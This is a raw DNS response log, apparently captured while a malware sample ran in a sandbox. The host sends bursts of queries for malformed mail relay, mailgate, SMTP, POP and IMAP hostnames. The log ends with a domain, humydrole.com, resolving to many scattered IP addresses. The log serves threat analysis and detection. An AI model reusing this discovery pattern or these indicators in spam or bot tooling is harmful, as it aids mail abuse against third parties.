Nov 30, 2023 11:22:53.556034088 CET	1.1.1.1	192.168.2.4	0x5179	Name error (3)	mailgate.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.556077003 CET	1.1.1.1	192.168.2.4	0x1207	Name error (3)	mailgate.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.556710958 CET	1.1.1.1	192.168.2.4	0x17e3	Name error (3)	mailgate.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.557693958 CET	1.1.1.1	192.168.2.4	0x5d68	Name error (3)	rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.558923960 CET	1.1.1.1	192.168.2.4	0x80ae	Name error (3)	mailgate.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.611728907 CET	1.1.1.1	192.168.2.4	0x15db	Name error (3)	relay.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.654397964 CET	1.1.1.1	192.168.2.4	0xca39	Name error (3)	relay.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.704413891 CET	1.1.1.1	192.168.2.4	0x3b5e	No error (0)	mail.6ail.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.704413891 CET	1.1.1.1	192.168.2.4	0x3b5e	No error (0)	mail.6ail.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.727354050 CET	1.1.1.1	192.168.2.4	0x89ab	No error (0)	ww38.aqh.net	778748.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:53.727354050 CET	1.1.1.1	192.168.2.4	0x89ab	No error (0)	778748.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.727354050 CET	1.1.1.1	192.168.2.4	0x89ab	No error (0)	778748.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.734431028 CET	1.1.1.1	192.168.2.4	0x89ab	No error (0)	ww38.aqh.net	778748.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:53.734431028 CET	1.1.1.1	192.168.2.4	0x89ab	No error (0)	778748.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.734431028 CET	1.1.1.1	192.168.2.4	0x89ab	No error (0)	778748.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.741674900 CET	1.1.1.1	192.168.2.4	0x6e3c	Name error (3)	relay.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.745817900 CET	1.1.1.1	192.168.2.4	0xc873	Name error (3)	relay.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.749835968 CET	1.1.1.1	192.168.2.4	0x15f9	Name error (3)	relay.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.812931061 CET	1.1.1.1	192.168.2.4	0x4540	Name error (3)	mailgate.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.836815119 CET	1.1.1.1	192.168.2.4	0xe38d	Name error (3)	relay.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.839721918 CET	1.1.1.1	192.168.2.4	0xd47d	Name error (3)	mailgate.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.853348017 CET	1.1.1.1	192.168.2.4	0x4540	Name error (3)	mailgate.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.856313944 CET	1.1.1.1	192.168.2.4	0x4c8	Name error (3)	mailgate.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.857404947 CET	1.1.1.1	192.168.2.4	0x815d	Name error (3)	relay.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.858979940 CET	1.1.1.1	192.168.2.4	0x3c92	Name error (3)	relay.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.015703917 CET	1.1.1.1	192.168.2.4	0xe38d	Name error (3)	relay.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.173110008 CET	1.1.1.1	192.168.2.4	0x4db4	Name error (3)	mailgate.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.266536951 CET	1.1.1.1	192.168.2.4	0x4db4	Name error (3)	mailgate.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.272731066 CET	1.1.1.1	192.168.2.4	0xf35f	Name error (3)	relay.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.276321888 CET	1.1.1.1	192.168.2.4	0x351	Name error (3)	relay.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.277615070 CET	1.1.1.1	192.168.2.4	0x1359	Name error (3)	mailgate.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.283986092 CET	1.1.1.1	192.168.2.4	0x48be	Name error (3)	ftp.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.399633884 CET	1.1.1.1	192.168.2.4	0xdd53	Name error (3)	mail.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.420377016 CET	1.1.1.1	192.168.2.4	0x80b7	Name error (3)	relay.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.484842062 CET	1.1.1.1	192.168.2.4	0x990e	Name error (3)	relay.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.496964931 CET	1.1.1.1	192.168.2.4	0x7a45	Name error (3)	relay.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.545742989 CET	1.1.1.1	192.168.2.4	0xc21d	Name error (3)	relay.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.548346996 CET	1.1.1.1	192.168.2.4	0xfd76	Name error (3)	relay.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.829942942 CET	1.1.1.1	192.168.2.4	0xbd84	Name error (3)	ssh.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.835108042 CET	1.1.1.1	192.168.2.4	0x4b0b	Name error (3)	relay.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.882680893 CET	1.1.1.1	192.168.2.4	0x8929	Name error (3)	relay.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.887851000 CET	1.1.1.1	192.168.2.4	0x3bee	Name error (3)	relay.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.080334902 CET	1.1.1.1	192.168.2.4	0xe5b0	Name error (3)	relay.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.091996908 CET	1.1.1.1	192.168.2.4	0xbf5c	Name error (3)	relay.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.164426088 CET	1.1.1.1	192.168.2.4	0xba4f	Name error (3)	relay.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.209151030 CET	1.1.1.1	192.168.2.4	0x57d7	Name error (3)	relay.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.255620003 CET	1.1.1.1	192.168.2.4	0x9a91	Name error (3)	relay.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.266999006 CET	1.1.1.1	192.168.2.4	0x4ae4	Name error (3)	relay.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.331357002 CET	1.1.1.1	192.168.2.4	0x27b9	Name error (3)	relay.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.340044975 CET	1.1.1.1	192.168.2.4	0xd7dc	Name error (3)	relay.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.402479887 CET	1.1.1.1	192.168.2.4	0x58c7	Name error (3)	relay.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.403708935 CET	1.1.1.1	192.168.2.4	0x944a	Name error (3)	relay.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.405483007 CET	1.1.1.1	192.168.2.4	0xa27f	Name error (3)	relay.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.446813107 CET	1.1.1.1	192.168.2.4	0xa0d0	Name error (3)	relay.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.455914021 CET	1.1.1.1	192.168.2.4	0x27b9	Name error (3)	relay.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.461005926 CET	1.1.1.1	192.168.2.4	0x147a	Name error (3)	relay.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.529019117 CET	1.1.1.1	192.168.2.4	0x5176	Name error (3)	relay.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.567200899 CET	1.1.1.1	192.168.2.4	0xd7dc	Name error (3)	relay.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.570544004 CET	1.1.1.1	192.168.2.4	0x22b0	Name error (3)	relay.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.575576067 CET	1.1.1.1	192.168.2.4	0x9b9e	Name error (3)	relay.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.577749968 CET	1.1.1.1	192.168.2.4	0xd5db	Name error (3)	relay.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.578346968 CET	1.1.1.1	192.168.2.4	0x97b9	Name error (3)	relay.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.632247925 CET	1.1.1.1	192.168.2.4	0x508e	Name error (3)	relay.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.634000063 CET	1.1.1.1	192.168.2.4	0x9b24	Name error (3)	relay.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.634080887 CET	1.1.1.1	192.168.2.4	0x934e	Name error (3)	relay.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.634849072 CET	1.1.1.1	192.168.2.4	0x2b70	Name error (3)	relay.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.652498007 CET	1.1.1.1	192.168.2.4	0xfc4a	Name error (3)	relay.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.656915903 CET	1.1.1.1	192.168.2.4	0x19cc	Name error (3)	relay.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.679994106 CET	1.1.1.1	192.168.2.4	0x6b12	Name error (3)	relay.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.681113958 CET	1.1.1.1	192.168.2.4	0x624b	Name error (3)	relay.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.682281017 CET	1.1.1.1	192.168.2.4	0xd062	Name error (3)	relay.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.682956934 CET	1.1.1.1	192.168.2.4	0x908d	Name error (3)	relay.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.701922894 CET	1.1.1.1	192.168.2.4	0x3d0d	Name error (3)	relay.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.722516060 CET	1.1.1.1	192.168.2.4	0x863a	Name error (3)	relay.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.726198912 CET	1.1.1.1	192.168.2.4	0x841a	Name error (3)	relay.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.727452993 CET	1.1.1.1	192.168.2.4	0x61a3	Name error (3)	relay.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.729429007 CET	1.1.1.1	192.168.2.4	0x5e49	Name error (3)	relay.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.742793083 CET	1.1.1.1	192.168.2.4	0x7fe4	Name error (3)	relay.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.758136988 CET	1.1.1.1	192.168.2.4	0x82ef	Name error (3)	relay.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.758786917 CET	1.1.1.1	192.168.2.4	0xa0b7	Name error (3)	relay.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.759443998 CET	1.1.1.1	192.168.2.4	0x747c	Name error (3)	relay.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.761236906 CET	1.1.1.1	192.168.2.4	0xfc9a	Name error (3)	relay.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.761374950 CET	1.1.1.1	192.168.2.4	0xabaf	Name error (3)	relay.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.763966084 CET	1.1.1.1	192.168.2.4	0x4b0e	Name error (3)	relay.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.765491009 CET	1.1.1.1	192.168.2.4	0xe744	Name error (3)	relay.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.790448904 CET	1.1.1.1	192.168.2.4	0x34d5	Name error (3)	relay.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.828257084 CET	1.1.1.1	192.168.2.4	0xdb73	Name error (3)	relay.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.830935955 CET	1.1.1.1	192.168.2.4	0x771	Name error (3)	relay.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.835793972 CET	1.1.1.1	192.168.2.4	0xde08	Name error (3)	relay.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.836664915 CET	1.1.1.1	192.168.2.4	0x899	Name error (3)	relay.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.838080883 CET	1.1.1.1	192.168.2.4	0xc0b	Name error (3)	relay.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.838715076 CET	1.1.1.1	192.168.2.4	0x1ccf	Server failure (2)	relay.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.856060982 CET	1.1.1.1	192.168.2.4	0xbc31	Name error (3)	relay.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.889049053 CET	1.1.1.1	192.168.2.4	0x863a	Name error (3)	relay.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.892497063 CET	1.1.1.1	192.168.2.4	0xfe45	Name error (3)	relay.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.902863026 CET	1.1.1.1	192.168.2.4	0x74ac	Name error (3)	pop.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.902985096 CET	1.1.1.1	192.168.2.4	0x52b0	Name error (3)	relay.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.916249990 CET	1.1.1.1	192.168.2.4	0x5d89	Name error (3)	relay.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.932815075 CET	1.1.1.1	192.168.2.4	0xc179	Name error (3)	relay.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.947459936 CET	1.1.1.1	192.168.2.4	0x12d1	Name error (3)	relay.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.947473049 CET	1.1.1.1	192.168.2.4	0xbe40	Name error (3)	relay.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.950373888 CET	1.1.1.1	192.168.2.4	0x987f	Name error (3)	relay.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.950886011 CET	1.1.1.1	192.168.2.4	0x9bc3	Name error (3)	relay.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.951149940 CET	1.1.1.1	192.168.2.4	0xfee8	Name error (3)	relay.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.952624083 CET	1.1.1.1	192.168.2.4	0x441a	Name error (3)	relay.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.954293013 CET	1.1.1.1	192.168.2.4	0x5d60	Name error (3)	relay.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.003218889 CET	1.1.1.1	192.168.2.4	0xe7a5	Name error (3)	relay.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.003894091 CET	1.1.1.1	192.168.2.4	0xe4c6	Name error (3)	relay.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.021826982 CET	1.1.1.1	192.168.2.4	0x4c60	Name error (3)	relay.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.029274940 CET	1.1.1.1	192.168.2.4	0x7caa	Server failure (2)	relay.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.030452013 CET	1.1.1.1	192.168.2.4	0x2961	Name error (3)	relay.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.034058094 CET	1.1.1.1	192.168.2.4	0xa9fa	Name error (3)	relay.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.049576998 CET	1.1.1.1	192.168.2.4	0xa9fa	Name error (3)	relay.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.051903009 CET	1.1.1.1	192.168.2.4	0x5b5	Name error (3)	relay.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.055313110 CET	1.1.1.1	192.168.2.4	0x5028	Name error (3)	relay.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.062984943 CET	1.1.1.1	192.168.2.4	0x97a	Name error (3)	relay.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.064379930 CET	1.1.1.1	192.168.2.4	0xb0ca	Name error (3)	relay.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.144679070 CET	1.1.1.1	192.168.2.4	0x5683	Name error (3)	relay.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.160402060 CET	1.1.1.1	192.168.2.4	0xe106	Name error (3)	relay.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.210490942 CET	1.1.1.1	192.168.2.4	0x5683	Name error (3)	relay.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.364192009 CET	1.1.1.1	192.168.2.4	0x99b2	Name error (3)	relay.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.425833941 CET	1.1.1.1	192.168.2.4	0xe106	Name error (3)	relay.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.427187920 CET	1.1.1.1	192.168.2.4	0x99b2	Name error (3)	relay.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.435673952 CET	1.1.1.1	192.168.2.4	0x231c	Name error (3)	relay.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.436265945 CET	1.1.1.1	192.168.2.4	0x8672	Name error (3)	relay.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.445229053 CET	1.1.1.1	192.168.2.4	0x4ed0	Name error (3)	imap.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.447299004 CET	1.1.1.1	192.168.2.4	0x2e75	Name error (3)	relay.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.686799049 CET	1.1.1.1	192.168.2.4	0xed25	Name error (3)	relay.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.686850071 CET	1.1.1.1	192.168.2.4	0xed25	Name error (3)	relay.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.905317068 CET	1.1.1.1	192.168.2.4	0xbdb5	Name error (3)	relay.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.336950064 CET	1.1.1.1	192.168.2.4	0xb082	No error (0)	imap.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.337035894 CET	1.1.1.1	192.168.2.4	0xb082	No error (0)	imap.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.352145910 CET	1.1.1.1	192.168.2.4	0x5268	Name error (3)	pop3.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.740782022 CET	1.1.1.1	192.168.2.4	0x8b1c	Name error (3)	relay.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.740801096 CET	1.1.1.1	192.168.2.4	0x8b1c	Name error (3)	relay.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.999850988 CET	1.1.1.1	192.168.2.4	0xebcb	Name error (3)	mailgate.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:58.226074934 CET	1.1.1.1	192.168.2.4	0xc43a	Name error (3)	smtp.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:58.319907904 CET	1.1.1.1	192.168.2.4	0x20be	No error (0)	pop.1.tv		15.197.172.60	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:58.771003962 CET	1.1.1.1	192.168.2.4	0xf906	Name error (3)	relay.rhic-boutique.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:01.817544937 CET	1.1.1.1	192.168.2.4	0x945c	No error (0)	ssh.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:01.817569017 CET	1.1.1.1	192.168.2.4	0x945c	No error (0)	ssh.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:04.527394056 CET	1.1.1.1	192.168.2.4	0x25ac	No error (0)	mailstore1.secureserver.net		68.178.213.244	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:04.527394056 CET	1.1.1.1	192.168.2.4	0x25ac	No error (0)	mailstore1.secureserver.net		68.178.213.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:04.527394056 CET	1.1.1.1	192.168.2.4	0x25ac	No error (0)	mailstore1.secureserver.net		216.69.141.82	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.353159904 CET	1.1.1.1	192.168.2.4	0x5dcc	No error (0)	ftp.bjail.com	traff-3.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:06.353159904 CET	1.1.1.1	192.168.2.4	0x5dcc	No error (0)	traff-3.hugedomains.com	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:06.353159904 CET	1.1.1.1	192.168.2.4	0x5dcc	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.19.116.195	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.353159904 CET	1.1.1.1	192.168.2.4	0x5dcc	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.18.7.81	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.409717083 CET	1.1.1.1	192.168.2.4	0x81c0	Name error (3)	ftp.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.409737110 CET	1.1.1.1	192.168.2.4	0x482	No error (0)	ftp.6ail.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.409737110 CET	1.1.1.1	192.168.2.4	0x482	No error (0)	ftp.6ail.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.412077904 CET	1.1.1.1	192.168.2.4	0x6983	No error (0)	ftp.96l.com		15.197.204.56	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.412077904 CET	1.1.1.1	192.168.2.4	0x6983	No error (0)	ftp.96l.com		3.33.243.145	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.412301064 CET	1.1.1.1	192.168.2.4	0x827e	No error (0)	ftp.ct.ated.net		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.412301064 CET	1.1.1.1	192.168.2.4	0x827e	No error (0)	ftp.ct.ated.net		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.485369921 CET	1.1.1.1	192.168.2.4	0x7dd0	No error (0)	ftp.m7l.com	m7l.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:06.485369921 CET	1.1.1.1	192.168.2.4	0x7dd0	No error (0)	m7l.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.485369921 CET	1.1.1.1	192.168.2.4	0x7dd0	No error (0)	m7l.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.744550943 CET	1.1.1.1	192.168.2.4	0x47de	No error (0)	pop.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.744571924 CET	1.1.1.1	192.168.2.4	0x47de	No error (0)	pop.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.181.24.132	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		167.61.223.188	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928014040 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
